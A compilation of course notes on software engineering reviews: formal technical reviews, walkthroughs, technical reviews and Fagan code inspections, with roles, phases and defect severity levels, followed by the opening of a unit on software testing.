developed the work product—the producer—informs the project leader that the work

product is complete and that a review is required. The project leader contacts a

review leader, who evaluates the product for readiness, generates copies of product

materials, and distributes them to two or three reviewers for advance preparation.

Each reviewer is expected to spend between one and two hours reviewing the prod-

uct, making notes, and otherwise becoming familiar with the work. Concurrently, the

review leader also reviews the product and establishes an agenda for the review

meeting, which is typically scheduled for the next day.


uote:

“There is no urgeso great as for oneman to editanother man’swork.”

Mark Twain

WebRef

The NASA SATCFormal InspectionGuidebook can bedownloaded fromsatc.gsfc.nasa.gov/Documents/fi/gdb/fi.pdf.

An FTR focuses on arelatively small portionof a work product.

pre75977_ch15.qxd 11/27/08 5:54 PM Page 426

The review meeting is attended by the review leader, all reviewers, and the pro-

ducer. One of the reviewers takes on the role of a recorder, that is, the individual who

records (in writing) all important issues raised during the review. The FTR begins

with an introduction of the agenda and a brief introduction by the producer. The pro-

ducer then proceeds to “walk through” the work product, explaining the material,

while reviewers raise issues based on their advance preparation. When valid prob-

lems or errors are discovered, the recorder notes each.

At the end of the review, all attendees of the FTR must decide whether to: (1) ac-

cept the product without further modification, (2) reject the product due to severe er-

rors (once corrected, another review must be performed), or (3) accept the product

provisionally (minor errors have been encountered and must be corrected, but no

additional review will be required). After the decision is made, all FTR attendees

complete a sign-off, indicating their participation in the review and their concur-

rence with the review team’s findings.

15.6.2 Review Reporting and Record Keeping

During the FTR, a reviewer (the recorder) actively records all issues that have been

raised. These are summarized at the end of the review meeting, and a review issues

list is produced. In addition, a formal technical review summary report is completed. A

review summary report answers three questions:

1. What was reviewed?

2. Who reviewed it?

3. What were the findings and conclusions?

The review summary report is a single page form (with possible attachments). It be-

comes part of the project historical record and may be distributed to the project

leader and other interested parties.

The review issues list serves two purposes: (1) to identify problem areas within

the product and (2) to serve as an action item checklist that guides the producer as

corrections are made. An issues list is normally attached to the summary report.

You should establish a follow-up procedure to ensure that items on the issues list

have been properly corrected. Unless this is done, it is possible that issues raised can

“fall between the cracks.” One approach is to assign the responsibility for follow-up

to the review leader.

15.6.3 Review Guidelines

Guidelines for conducting formal technical reviews must be established in advance,

distributed to all reviewers, agreed upon, and then followed. A review that is un-

controlled can often be worse than no review at all. The following represents a min-

imum set of guidelines for formal technical reviews:

1. Review the product, not the producer. An FTR involves people and egos. Con-

ducted properly, the FTR should leave all participants with a warm feeling of


In some situations, it’sa good idea to havesomeone other thanthe producer walkthrough the productundergoing review.This leads to a literalinterpretation of thework product andbetter error recogni-tion.

Don’t point out errorsharshly. One way to begentle is to ask aquestion that enablesthe producer todiscover the error.

pre75977_ch15.qxd 11/27/08 5:54 PM Page 427

accomplishment. Conducted improperly, the FTR can take on the aura of an

inquisition. Errors should be pointed out gently; the tone of the meeting

should be loose and constructive; the intent should not be to embarrass or

belittle. The review leader should conduct the review meeting to ensure that

the proper tone and attitude are maintained and should immediately halt a

review that has gotten out of control.

2. Set an agenda and maintain it. One of the key maladies of meetings of all

types is drift. An FTR must be kept on track and on schedule. The review

leader is chartered with the responsibility for maintaining the meeting sched-

ule and should not be afraid to nudge people when drift sets in.

3. Limit debate and rebuttal. When an issue is raised by a reviewer, there may

not be universal agreement on its impact. Rather than spending time debat-

ing the question, the issue should be recorded for further discussion off-line.

4. Enunciate problem areas, but don’t attempt to solve every problem noted. A re-

view is not a problem-solving session. The solution of a problem can often

be accomplished by the producer alone or with the help of only one other in-

dividual. Problem solving should be postponed until after the review meeting.

5. Take written notes. It is sometimes a good idea for the recorder to make notes

on a wall board, so that wording and priorities can be assessed by other re-

viewers as information is recorded. Alternatively, notes may be entered di-

rectly into a notebook computer.

6. Limit the number of participants and insist upon advance preparation. Two

heads are better than one, but 14 are not necessarily better than 4. Keep the

number of people involved to the necessary minimum. However, all review

team members must prepare in advance. Written comments should be

solicited by the review leader (providing an indication that the reviewer

has reviewed the material).

7. Develop a checklist for each product that is likely to be reviewed. A checklist

helps the review leader to structure the FTR meeting and helps each reviewer

to focus on important issues. Checklists should be developed for analysis,

design, code, and even testing work products.

8. Allocate resources and schedule time for FTRs. For reviews to be effective, they

should be scheduled as tasks during the software process. In addition, time

should be scheduled for the inevitable modifications that will occur as the

result of an FTR.

9. Conduct meaningful training for all reviewers. To be effective all review partici-

pants should receive some formal training. The training should stress both

process-related issues and the human psychological side of reviews. Freed-

man and Weinberg [Fre90] estimate a one-month learning curve for every

20 people who are to participate effectively in reviews.


uote:

“A meeting is toooften an event inwhich minutes aretaken and hoursare wasted.”

Author unknown

uote:

“It is one of themost beautifulcompensations oflife, that no mancan sincerely try tohelp anotherwithout helpinghimself.”

Ralph WaldoEmerson

pre75977_ch15.qxd 11/27/08 5:54 PM Page 428

10. Review your early reviews. Debriefing can be beneficial in uncovering prob-

lems with the review process itself. The very first product to be reviewed

should be the review guidelines themselves.

Because many variables (e.g., number of participants, type of work products, tim-

ing and length, specific review approach) have an impact on a successful review, a

software organization should experiment to determine what approach works best in

a local context.

15.6.4 Sample-Driven Reviews

In an ideal setting, every software engineering work product would undergo a for-

mal technical review. In the real word of software projects, resources are limited and

time is short. As a consequence, reviews are often skipped, even though their value

as a quality control mechanism is recognized.

Thelin and his colleagues [The01] suggest a sample-driven review process in

which samples of all software engineering work products are inspected to determine

which work products are most error prone. Full FTR resources are then focused only

on those work products that are likely (based on data collected during sampling) to

be error prone.

To be effective, the sample-driven review process must attempt to quantify those

work products that are primary targets for full FTRs. To accomplish this, the follow-

ing steps are suggested [The01]:

1. Inspect a fraction ai of each software work product i. Record the number of

faults fi found within ai.

2. Develop a gross estimate of the number of faults within work product i by

multiplying fi by 1/ai.

3. Sort the work products in descending order according to the gross estimate

of the number of faults in each.

4. Focus available review resources on those work products that have the high-

est estimated number of faults.

The fraction of the work product that is sampled must be representative of the work

product as a whole and large enough to be meaningful to the reviewers who do the

sampling. As ai increases, the likelihood that the sample is a valid representation of

the work product also increases. However, the resources required to do sampling

also increase. A software engineering team must establish the best value for ai for

the types of work products produced.3


Reviews take time, butit’s time well spend.However, if time isshort and you have noother option, do notdispense with reviews.Rather, use sample-driven reviews.

pre75977_ch15.qxd 11/27/08 5:54 PM Page 429

Reviews can also have a variety of objectives, where the term ‘review objective’ identifies the main focus for a review. Typical review objectives include:

• Finding defects. • Gaining understanding. • Generating discussion. • Decision making by consensus.

The way a review is conducted will depend on what its specific objective is, so a review aimed primarily at finding defects will be quite different from one that is aimed at gaining understanding of a document.

Basic Review Process All reviews, formal and informal alike, exhibit the same basic elements of process:

• The document under review is studied by the reviewers. • Reviewers identify issues or problems and inform the author either verbally or in

a documented form, which might be as formal as raising a defect report or as informal as annotating the document under review.

• The author decides on any action to take in response to the comments and updates the document accordingly.

This basic process is always present, but in the more formal reviews it is elaborated to include additional stages and more attention to documentation and measurement.

Roles and Responsibilities in a Review

There are various roles and responsibilities defined for a review process. Within a review team, four types of participants can be distinguished: moderator, author, scribe ,reviewer and manager. Lets discuss their roles one by one:-

1. The moderator:- The moderator (or review leader) leads the review process. His role is to determine the type of review, approach and the composition of the review team. The moderator also schedules the meeting, disseminates documents before the meeting, coaches other team members, paces the meeting, leads possible discussions and stores the data that is collected.

2. The author:- As the writer of the ‘document under review’, the author’s basic goal should be to learn as much as possible with regard to improving the quality of the document. The author’s task is to illuminate unclear areas and to understand the defects found.

3. The scribe/ recorder :- The scribe (or recorder) has to record each defect found and any suggestions or feedback given in the meeting for process improvement.

4. The reviewer:- The role of the reviewers is to check defects and further improvements in accordance to the business specifications, standards and domain knowledge.

5. The manager :- Manager is involved in the reviews as he or she decides on the execution of reviews, allocates time in project schedules and determines whether review process objectives have been met or not.

Activities of a Formal Review

Reviews at the more formal end of the spectrum, such as technical reviews and inspections, share certain characteristics that differentiate them from the less formal reviews, of which walkthroughs are a typical example. Below figure shows the key stages that characterize formal reviews.

Fig : Stages of a formal review

The following list explains the key stages in more detail:

1. Planning:

• a. Selecting the personnel—ensuring that those selected can and will add value to the process. There is little point in selecting a reviewer who will agree with

http://4.bp.blogspot.com/-hoJAaU_qxuc/TfRYsEBJ98I/AAAAAAAAACk/e6o2hLEJo5g/s1600/FormalReview.jpg

everything written by the author without question. As a rule of thumb it is best to include some reviewers who are from a different part of the organization, who are known to be ‘picky’, and known to be dissenters.

• b. Reviews, like weddings, are enhanced by including ‘something old, something new, something borrowed, something blue’. In this case ‘something old’ would be an experienced practitioner; ‘something new’ would be a new or inexperienced team member; ‘something borrowed’ would be someone from a different team; ‘something blue’ would be the dissenter who is hard to please. At the earliest stage of the process a review leader must be identified. This is the person who will coordinate all of the review activity.

• c. Allocating roles—each reviewer is given a role to provide them with a unique focus on the document under review. Someone in a tester role might be checking for testability and clarity of definition, while someone in a user role might look for simplicity and a clear relationship to business values. This approach ensures that, although all reviewers are working on the same document, each individual is looking at it from a different perspective.

• d. Defining the entry and exit criteria, especially for the most formal review types (e.g. inspection).

• e. Selecting the parts of documents to be reviewed (not always required; this will depend on the size of the document: a large document may need to be split into smaller parts and each part reviewed by a different person to ensure the whole document is reviewed fully).

2. Kick-off: distributing documents; explaining the objectives, process and documents to the participants; and checking entry criteria (for more formal review types such as inspections). This can be run as a meeting or simply by sending out the details to the reviewers. The method used will depend on timescales and the volume of information to pass on. A lot of information can be disseminated better by a meeting rather than expecting reviewers to read pages of text. 3. Review entry criteria: this stage is where the entry criteria agreed earlier are checked to ensure that they have been met, so that the review can continue—this is mainly used in the more formal review types such as inspections. 4. Individual preparation: work done by each of the participants on their own before the review meeting, which would include reading the source documents, noting potential defects, questions and comments. This is a key task and may actually be time-boxed, e.g. participants may be given two hours to complete the preparation. 5. Noting incidents: in this stage the potential defects, questions and comments found during individual preparation are logged. 6. Review meeting: this may include discussion regarding any defects found, or simply just a log of defects found. The more formal review types like inspections will have documented results or minutes. The meeting participants may simply note defects for

the author to correct; they might also make recommendations for handling or correcting the defects. The approach taken will have been decided at the kick-off stage so that all participants are aware of what is required of them. The decision as to which approach to take may be based on one or all of the following factors:

• a. Time available (if time is short the meeting may only collect defects). • b. Requirements of the author (if the author would like help in correcting defects). • c. Type of review (in an inspection only the collection of defects is allowed—there

is never any discussion).

7. Examine: this includes the recording of the physical meetings or tracking any group electronic communications. 8. Rework: after a review meeting the author will have a series of defects to correct; correcting the defects is called rework. 9. Fixing defects: here the author will be fixing defects that were found and agreed as requiring a fix. 10. Follow-up: the review leader will check that the agreed defects have been addressed and will gather metrics such as how much time was spent on the review and how many defects were found. The review leader will also check the exit criteria (for more formal review types such as inspections) to ensure that they have been met. 11. Checking exit criteria: at this stage the exit criteria defined at the start of the process are checked to ensure that all exit criteria have been met so that the review can be officially closed as finished.

Success Factors for Reviews When measuring the success of a particular review the following suggested success factors should be considered:

• Each review should have a clearly predefined and agreed objective and the right people should be involved to ensure the objective is met. For example, in an inspection each reviewer will have a defined role and therefore needs the experience to fulfill that role; this should include testers as valued reviewers.

• Any defects found are welcomed, and expressed objectively. • The review should be seen as being conducted within an atmosphere of trust, so

that the outcome will not be used for the evaluation of the participants, and that the people issues and psychological aspects are dealt with (e.g. making it a positive experience for the author and all participants).

• Review techniques (both formal and informal) that are suitable to the type and level of software work-products and reviewers (this is especially important in inspections).

• Checklists or roles should be used, where appropriate, to increase effectiveness of defect identification; for example, in an inspection, roles such as data entry clerk or technical architect may be required to review a particular document.

• Management support is essential for a good review process (e.g. by incorporating adequate time for review activities in project schedules).

• There should be an emphasis on learning and process improvement.

Other more quantitative approaches to success measurement could also be used:

• How many defects found. • Time taken to review/inspect. • Percentage of project budget used/saved.

What is Technical review?

A Technical review is a static white-box testing technique which is conducted to spot the defects early in the life cycle that cannot be detected by black box testing techniques.

Technical Review - Static Testing:

Technical Review Characteristics:

• Technical Reviews are documented and uses a defect detection process that has peers and technical specialist as part of the review process.

• The Review process doesn't involve management participation. • It is usually led by trained moderator who is NOT the author. • The report is prepared with the list of issues that needs to be addressed.

• It is less formal review • It is led by the trained moderator but can also be led by a technical expert • It is often performed as a peer review without management participation • Defects are found by the experts (such as architects, designers, key users) who

focus on the content of the document. • In practice, technical reviews vary from quite informal to very formal

The goals of the technical review are:

i. To ensure that an early stage the technical concepts are used correctly ii. To access the value of technical concepts and alternatives in the product iii. To have consistency in the use and representation of technical concepts iv. To inform participants about the technical content of the document

The goals of a technical review are to:

• assess the value of technical concepts and alternatives in the product and project environment;

• establish consistency in the use and representation of technical concepts; • ensure, at an early stage, that technical concepts are used correctly; • inform participants of the technical content of the document.

Key characteristics of a technical review are:

• It is a documented defect-detection process that involves peers and technical experts.

• It is often performed as a peer review without management participation. • Ideally it is led by a trained moderator, but possibly also by a technical expert. • A separate preparation is carried out during which the product is examined and

the defects are found. • More formal characteristics such as the use of checklists and a logging list or

issue log are optional.

About the purpose of technical reviews the IEEE standard says: "The purpose of a technical review is to evaluate a software product by a team of qualified personnel to

http://istqbexamcertification.com/what-is-defect-or-bugs-or-faults-in-software-testing/

determine its suitability for its intended use and identify discrepancies from specifications and standards." In other words the technical review is a meeting in which a team analyses a work product to see it its quality is as expected or if it needs some improvement. The standard further states that not necessarily all aspects of the review object have to be examined and that it is a possible purpose of the meeting to come up with alternatives for a better design. The list of work products for which the review can be applied is quite big: Software requirements specification , Software design description, Software test documentation, Software user documentation, Maintenance manuals, System build procedures, Installation procedures and Release notes are possible candidates for the review. The review meetings should be planned in the project plan or they can be held on request e.g. by the quality group. The roles involved in a technical review are as follows:

• Decision maker • Review leader • Recorder • Technical staff • Management staff (optional) • Other team members (optional) • Customer or user representative (optional)

Walk-Through A walk-through can have a twofold purpose. First of all is can be performed to evaluate a software product with the purpose of:

1. Find anomalies 2. Improve the software product 3. Consider alternative implementations 4. Evaluate the conformance to standards and specifications

In summary you could say that this kind of walk-trough is a method which should be used throughout the design phase of a software product to collect ideas and inputs from other team members which lead to an overall improvement of the product. The second objective of a walk-through is to share knowledge and perform training of the participants. It is a method to raise all team members to the same level of knowledge regarding programming styles and details of the product. In a sense it also generates agreement within the team about the object of the walk-through. The formal aspects of a walk-through have a low profile. There are only a few roles defined in the standard. There is a walk-through leader, a recorder, the author of the work product and team members. The standard says that at least two members have to be assembled for the walk-through and the roles can be shared among them. The walk-through has to be planned which means that the participants have to be defined and the meeting has to be scheduled. Further the findings and outcomes of the meeting have to be recorded. In total this is a nice and easy to use method for everyday technical work from which you can expect good benefit.

Walkthrough:

• It is not a formal process/review • It is led by the authors • Author guide the participants through the document according to his or her

thought process to achieve a common understanding and to gather feedback. • Useful for the people if they are not from the software discipline, who are not

used to or cannot easily understand software development process. • Is especially useful for higher level documents like requirement specification, etc.

The goals of a walkthrough:

i. To present the documents both within and outside the software discipline in order to gather the information regarding the topic under documentation.

ii. To explain or do the knowledge transfer and evaluate the contents of the document

iii. To achieve a common understanding and to gather feedback. iv. To examine and discuss the validity of the proposed solutions

Code Walkthrough is a form of peer review in which a programmer leads the review process and the other team members ask questions and spot possible errors against development standards and other issues.

• The meeting is usually led by the author of the document under review and attended by other members of the team.

• Review sessions may be formal or informal. • Before the walkthrough meeting, the preparation by reviewers and then a review

report with a list of findings. • The scribe, who is not the author, marks the minutes of meeting and note down

all the defects/issues so that it can be tracked to closure. • The main purpose of walkthrough is to enable learning about the content of the

document under review to help team members gain an understanding of the content of the document and also to find defects.

Where Code Walkthrough fits in ?

A walkthrough is characterized by the author of the document under review guiding the participants through the document and his or her thought processes, to achieve a common understanding and to gather feedback. This is especially useful if people from outside the software discipline are present, who are not used to, or cannot easily understand software development documents.

The content of the document is explained step by step by the author, to reach consensus on changes or to gather information. Within a walkthrough the author does most of the preparation.

The participants, who are selected from different departments and backgrounds, are not required to do a detailed study of the documents in advance.

Because of the way the meeting is structured, a large number of people can participate and this larger audience can bring a great number of diverse viewpoints regarding the contents of the document being reviewed as well as serving an educational purpose.

If the audience represents a broad cross-section of skills and disciplines, it can give assurance that no major defects are 'missed' in the walk-through. A walkthrough is especially useful for higher-level documents, such as requirement specifications and architectural documents.

THE RULES OF A WALKTHROUGH The rules governing a walkthrough are: Provide adequate time Use multiple sessions when necessary Prepare a set of test cases Provide a copy of the program being tested to each team member Provide other support materials

The specific goals of a walkthrough depend on its role in the creation of the document. In general the following goals can be applicable:

o to present the document to stakeholders both within and outside the soft ware discipline, in order to gather information regarding the topic under documentation;

o to explain (knowledge transfer) and evaluate the contents of the document;

o to establish a common understanding of the document; o to examine and discuss the validity of proposed solutions and the viability

of alternatives, establishing consensus.

• Key characteristics of walkthroughs are:

o The meeting is led by the authors; often a separate scribe is present. o Scenarios and dry runs may be used to validate the content. o Separate pre-meeting preparation for reviewers is optional.

Walkthrough:

Method of conducting informal group/individual review is called walkthrough, in which a designer or programmer leads members of the development team and other interested parties through a software product, and the participants ask questions and make comments about possible errors, violation of development standards, and other problems or may suggest improvement on the article, walkthrough can be pre planned or can be conducted at need basis and generally people working on the work product are involved in the walkthrough process.

The Purpose of walkthrough is to:

· Find problems · Discuss alternative solutions · Focusing on demonstrating how work product meets all requirements.

IEEE 1028 recommends three specialist roles in a walkthrough:

Leader: who conducts the walkthrough, handles administrative tasks, and ensures orderly conduct (and who is often the Author) Recorder: who notes all anomalies (potential defects), decisions, and action items identified during the walkthrough meeting, normally generate minutes of meeting at the end of walkthrough session. Author: who presents the software product in step-by-step manner at the walk-through meeting, and is probably responsible for completing most action items.

Walkthrough Process:

Author describes the artifact to be reviewed to reviewers during the meeting. Reviewers present comments, possible defects, and improvement suggestions to the author. Recorder records all defect, suggestion during walkthrough meeting. Based on reviewer comments, author performs any necessary rework of the work product if required. Recorder prepares minutes of meeting and sends the relevant stakeholders and leader is normally to monitor overall walkthrough meeting activities as per the defined company process or responsibilities for conducting the reviews, generally performs monitoring activities, commitment against action items etc.

Scheduling Walkthroughs

• Walkthroughs should be conducted frequently o Focuses on a specific and small piece of work o Increases the likelihood of uncovering errors o Before author has too great an ego investment

• Scheduled only when the author is ready • About 4 or 5 people • Advanced preparation (no more than 2 hours) should be required of and

performed by each reviewer

Roles

• Coordinator (Review Leader) • Author (Producer) • Reviewers • Recorder

Conducting Walkthroughs

• Coordinator chairs the meeting • Walkthrough structure

o Author's overview? Reviewers should be able to understand the product without

assistance Author's overview may "brainwash" reviewers into making the same

logical errors as did the author o Author's detailed walkthrough

Based on logical arguments of what the design or code will do at various stages

o Requested specific test cases • Coordinator resolves disagreements when the team can not reach a consensus

Types of Walkthroughs

• Specification walkthroughs o System specification o Project planning o Requirements analysis

• Design walkthroughs o Preliminary design o Design

• Code walkthroughs • Test walkthroughs

o Test plan o Test procedure

• Maintenance reviews

Specification Walkthroughs

• Objective - Check the system specification for: o Problems o Inaccuracies o Ambiguities o Omissions

• Participants o User o Senior analyst o Project analysts

• Objects o DFDs, Data Dictionary, ERDs, ...

Design Walkthroughs

• Objective - Check the architecture of the design for: o Flaws o Weaknesses o Errors o Omissions

• Participants o User o Analyst o Senior designer o Project designers

• Objects o Structure charts, detailed design documents, ...

Code Walkthroughs

• Objective - Check the code for: o Errors o Standards violations o Lack of clarity o Inconsistency

• Participants o Author o Project programmers o Designer o Outside programmers

• Objects o Code listing, compiler listings, ...

Test Walkthroughs

• Objective - Check the testing documents for: o Inadequacy o Incompleteness o Lack of clarity

• Participants o Project programmers o Tester o Analyst o Designer

• Objects o Test plan, test procedures, sample test data, ...

what are benefits of walkthroughs?

There are a lot of benefits, some of them are

• Consciousness-raising-Senior people get new ideas and insights from junior people.

• Enables observation of different approaches to software analysis, design, and implementation

• "Peer pressure" improves quality • Promotes backup and continuity-Reduces risk of discontinuity & "useless code"

since several people become familiar with parts of software that they may not have otherwise seen

http://s-qa.blogspot.in/2009/03/what-are-benefits-of-walkthroughs.html

Inspections

The goals of inspection are:

i. It helps the author to improve the quality of the document under inspection ii. It removes defects efficiently and as early as possible iii. It improve product quality iv. It create common understanding by exchanging information v. It learn from defects found and prevent the occurrence of similar defects

There are various names for the same thing. Some call it software inspection, which also could extend to the design and its documentation, some call it code inspection which relates more to the source code. A third name would be Fagan Inspection, called after the person who invented this quality assurance and testing method. Code inspections are a highly efficient test method which cannot be substituted by any other test methods. It is time consuming but according to statistics it will find up to 80% of the contained faults, if done properly. However it all depends on the methods and checks applied and on the diligence of the inspectors. It must not be confused with the so called "code review" or "walk through" which is usually done in a single meeting lasting for a couple of hours. A proper code inspection may take several days and needs the help of tools to browse the symbols in order to find the places where they are used. Proper inspections can be applied for almost all work products in the software life cycle. At the first glance they may look very time consuming. But statistical evaluations have shown that over the whole life cycle of the software development they even save resources and thus money and improve the quality of the product.

Benefits

Increase the quality of products

Decrease the time and cost to develop and maintain products

Ensure the completeness and integrity of the overall software package

Code inspections are the most formal type of review meeting. The sole purpose of an inspection is to find defects in a document. Inspections can be used to review planning documents, requirements,

The generally accepted goals of inspection are to:

* help the author to improve the quality of the document under inspection* remove defects efficiently, as early as possible* improve product quality, by producing documents with a higher level of quality* create a common understanding by exchanging information among the inspection

participants* train new employees in the organization's development process* learn from defects found and improve processes in order to prevent recurrence of similar

defects* sample a few pages or sections from a larger document in order to measure the typical

quality of the document, leading to improved work by individuals in the future, and to process improvements. Key characteristics of an inspection are:

* It is usually led by a trained moderator (certainly not by the author).* It uses defined roles during the process.* It involves peers to examine the product.* Rules and checklists are used during the preparation phase.* A separate preparation is carried out during which the product is examined and the

defects are found.* The defects found are documented in a logging list or issue log.* A formal follow-up is carried out by the moderator applying exit criteria.* Optionally, a causal analysis step is introduced to address process improve ment issues

and learn from the defects found.* Metrics are gathered and analyzed to optimize the process.


designs, or code, in short, any work product that a development team produces. Code inspections have specific rules regarding how many lines of code to review at once, how long the review meeting must be, and how much preparation each member of the review team should do, among other things. Inspections are typically used by larger organizations because they take more time and effort than walkthroughs or code reviews. They are also used for mission and safety-critical software where defects can cause harm to users. The most widely known inspection methodology was invented by Michael Fagan in 1976. Fagan’s process was the first formal software inspection process proposed and as such, has been very influential. Most organizations that use inspections use a variation of the original Fagan software code inspection process.4 Code inspections have several very important criteria, including:

• Inspections use checklists of common error types to focus the inspectors.

• The focus of the inspection meeting is solely on finding errors; no solutions arepermitted.

• Reviewers are required to prepare beforehand; the inspection meeting will becanceled if everyone isn’t ready.

• Each participant in the inspection has a distinct role.

• All participants have had inspection training.

• The moderator is not the author and has had special training in addition to theregular inspection training.

• The author is always required to follow up on errors reported in the meeting withthe moderator.

• Metrics data is always collected at an inspection meeting.

Inspection Roles The following are the roles used in code inspections:

• Moderator: The moderator gets all the materials from the author, decides who theother participants in the inspection should be, and is responsible for sending outall the inspection materials and scheduling and coordinating the meeting.Moderators must be technically competent; they need to understand theinspection materials and keep the meeting on track. The moderator schedules theinspection meeting and sends out the checklist of common errors for thereviewers to peruse. They also follow-up with the author on any errors found inthe inspection, so they must understand the errors and the corrections.Moderators attend an additional inspection-training course to help them preparefor their role.



• Author: The author distributes the inspection materials to the moderator. If anOverview meeting is required, the author chairs it and explains the overall designto the reviewers. Overview meetings are discouraged in code inspections, becausethey can “taint the evidence” by injecting the author’s opinions about the codeand the design before the inspection meeting. Sometimes, however, if many of thereviewers are not familiar with the project an Overview meeting is necessary. Theauthor is also responsible for all rework that is created as a result of the inspectionmeeting. During the inspection the author answers questions about the code fromthe reviewers, but does nothing else.

• Reader: The reader’s role is to read the code. Actually, the reader is supposed toparaphrase the code, not read it. This implies that the reader has a goodunderstanding of the project, its design and the code in question. The reader doesnot explain the code; he just paraphrases it. The author should answer anyquestions about the code. That said, if the author has to explain too much of the code that is usually considered a defect to be fixed; the code should be refactoredto make it simpler.

• Reviewers: The reviewers do the heavy lifting in the inspection. A reviewer can beanyone with an interest in the code who is not the author. Normally reviewers areother developers from the same project. As in code reviews it’s usually a good ideato have a senior person who is not on the project also be a reviewer. There areusually between two and four reviewers in an inspection meeting. Reviewers mustdo their pre-reading of the inspection materials and are expected to come to themeeting with a list of errors that they have found. This list is given to the Recorder.

• Recorder: Every inspection meeting has a recorder. The recorder is one of thereviewers and is the person who takes notes at the inspection meeting. Therecorder merges the defect lists of the reviewers and classifies and records errorsfound during the meeting. The recorder prepares the inspection report anddistributes it to the meeting participants. If the project is using a defectmanagement system, then it is up to the Recorder to enter defect reports for allmajor defects from the meeting into the system.

• Managers: As with code reviews, managers are not invited to code inspections.

Inspection Phases and Procedures Fagan inspections have seven phases that must be followed for each inspection:5

1. Planning

2. The Overview meeting

3. Preparation



4. The Inspection meeting

5. The Inspection report

6. Rework

7. Follow up

Planning In the Planning phase, the moderator organizes and schedules the meeting and picks the participants. The moderator and the author get together to discuss the scope of the inspection materials – for code inspections typically between 200 and 500 uncommented lines of code will be reviewed. The author then distributes the code to be inspected to the participants.

The Overview Meeting An Overview meeting is necessary if several of the participants are unfamiliar with the project or its design and they need to come up to speed before they can effectively read the code. If an Overview meeting is necessary, the author will call it and run the meeting. The meeting itself is mostly a presentation by the author of the project architecture and design. As mentioned, Overview meetings are discouraged, because they have a tendency to taint the evidence. Like the Inspection meeting itself, Overview meetings should last no longer than two hours.

Preparation In the Preparation phase, each reviewer reads the work to be inspected. Preparation should take no more than 2–3 hours. The amount of work to be inspected should be between 200 and 500 uncommented lines of code or between 30 and 80 pages of text. A number of studies have shown that reviewers can typically review about 125–200 lines of code per hour. In Fagan inspections, the preparation phase is required. The inspection meeting can be canceled if the reviewers have not done their preparation. The amount of time each reviewer spent in preparation is one of the metrics that is gathered at the inspection meeting.

The Inspection Meeting The moderator is in charge of the Inspection meeting. Her job during the meeting is to keep the meeting on track and focused. The Inspection meeting should last no more than two hours. If there is any material that has not been inspected at the end of that time, a new meeting is scheduled. At the beginning of the meeting, the reviewers turn in their list of previously discovered errors to the recorder.

During the meeting the reader paraphrases the code and the reviewers follow along. The author is there to clarify any details and answer any questions about the code and otherwise does nothing. The recorder writes down all the defects reported, their severity and their classification. Solutions to problems are strongly discouraged. Participants are encouraged to have a different meeting to discuss solutions.



We should look for a minute at defect types and severity as reported in a Fagan inspection. Fagan specifies only two types of defects: minor and major. Minor defects are typically typographic errors, errors in documentation, small user interface errors, and other miscellany that don’t cause the software to fail. All other errors are major defects. This is a bit extreme. Two levels are usually not sufficient for most development organizations. Most organizations will have at least a five level defect structure:

1. Fatal: Yes, your program dies; can you say core dump?

2. Severe: A major piece of functionality fails and there is no workaround for theuser. Say that in a first-person shooter game, the software doesn’t allow you tore-load your main weapon and doesn’t let you switch weapons in the middleof a fight. That’s bad.

3. Serious: The error is severe, but with a workaround for the user. The softwaredoesn’t let you re-load your main weapon, but if you switch weapons and thenswitch back you can re-load.

4. Trivial: A small error, either wrong documentation or something like a minoruser interface problem. For example, a text box is 10 pixels too far from itsprompt in a form.

5. Feature request: A brand new feature for the program is desired. This isn’t anerror; it’s a request from the user (or marketing) for new functionality in thesoftware. In a game this could be new weapons, new character types, newmaps or surroundings, and so on. This is version 2.

In most organizations, software is not allowed to ship to a user with known severity 1 and 2 errors still in it. But severity 3 errors really make users unhappy, so realistically, no known severity 1 through 3 errors are allowed to ship. Ideally, of course, no errors ship, right?

In a Fagan inspection meeting it is usually up to the recorder to correctly classify the severity of the major defects found in the code. This classification can be changed later. In the Fagan inspection process all severity 1 through 3 defects are required to be fixed.

Inspection Report Within a day of the meeting, the recorder distributes the Inspection report to all participants. The central part of the report is the defects that were found in the code at the meeting.

The report also includes metrics data, including

• The number of defects found

• The number of each type of defect by severity and type

• The time spent in preparation; total time in person-hours and time per participant

• The time spent in the meeting; clock time and total person-hours

• The number of uncommented lines of code or pages reviewed



Rework and Follow Up The author fixes all the severity 1 through 3 defects found during the meeting. If enough defects were found, or if enough refactoring or code changes had to occur, then another inspection is scheduled. How much is enough? Amounts vary. McConnell says 5% of the code,6 but this author has typically used 10% of the code inspected. So if you inspected 200 lines of code and you had to change 20 or more of them in the rework, then you should have another inspection meeting. If it’s less than 10%, the author and the moderator can do a walkthrough. Regardless of how much code is changed, the moderator must check all the changes as part of the follow up. As part of the rework another metric should be reported – the amount of time required by the author to fix each of the defects reported. This metric, plus the number of defects found during the project are critical to doing accurate planning and scheduling for the next project. This metric is easier to keep track of if developers use a defect tracking system.

Summary of Review Methodologies Table 15-1 summarizes the characteristics of the three review methodologies we’ve examined. Each has its place and you should know how each of them works. The important thing to remember is that reviews and testing go hand in hand and both should be used to get your high-quality code out the door.

Table 15-1. Comparison of Review Methodologies

Properties Walkthrough Code Review Code Inspection

Formal moderator training No No Yes

Distinct participant roles No Yes Yes

Who drives the meeting Author Author/moderator Moderator

Common error checklists No Maybe Yes

Focused review effort No Yes Yes

Formal follow up No Maybe Yes

Detailed defect feedback Incidental Yes Yes

Metric data collected and used No Maybe Yes

Process improvements No No Yes


UNIT III - TEST GENERATION

Software testing

Testing is the process of evaluating a system or its component(s) with the intent to find that whether it satisfies the specified requirements or not.

Testing is executing a system in order to identify any gaps, errors or missing requirements in contrary to the actual desire or requirements.

It involves the execution of a software component or system to evaluate one or more properties of interest. In general, these properties indicate the extent to which the component or system under test:

• meets the requirements that guided its design and development, • responds correctly to all kinds of inputs, • performs its functions within an acceptable time, • is sufficiently usable, • can be installed and run in its intended environments, and • achieves the general result its stakeholders desire.

What is testing?

Testing is the process of evaluating a system or its component(s) with the intent to find that whether it satisfies the specified requirements or not. This activity results in the actual, expected and difference between their results. In simple words testing is executing a system in order to identify any gaps, errors or missing requirements in contrary to the actual desire or requirements.

According to ANSI/IEEE 1059 standard, Testing can be defined as A process of analyzing a software item to detect the differences between existing and required conditions (that is defects/errors/bugs) and to evaluate the features of the software item.

Who does testing?

http://en.wikipedia.org/wiki/Operating_environment

It depends on the process and the associated stakeholders of the project(s). In the IT industry, large companies have a team with responsibilities to evaluate the developed software in the context of the given requirements. Moreover, developers also conduct testing which is called Unit Testing. In most cases, following professionals are involved in testing of a system within their respective capacities:

• Software Tester • Software Developer • Project Lead/Manager • End User

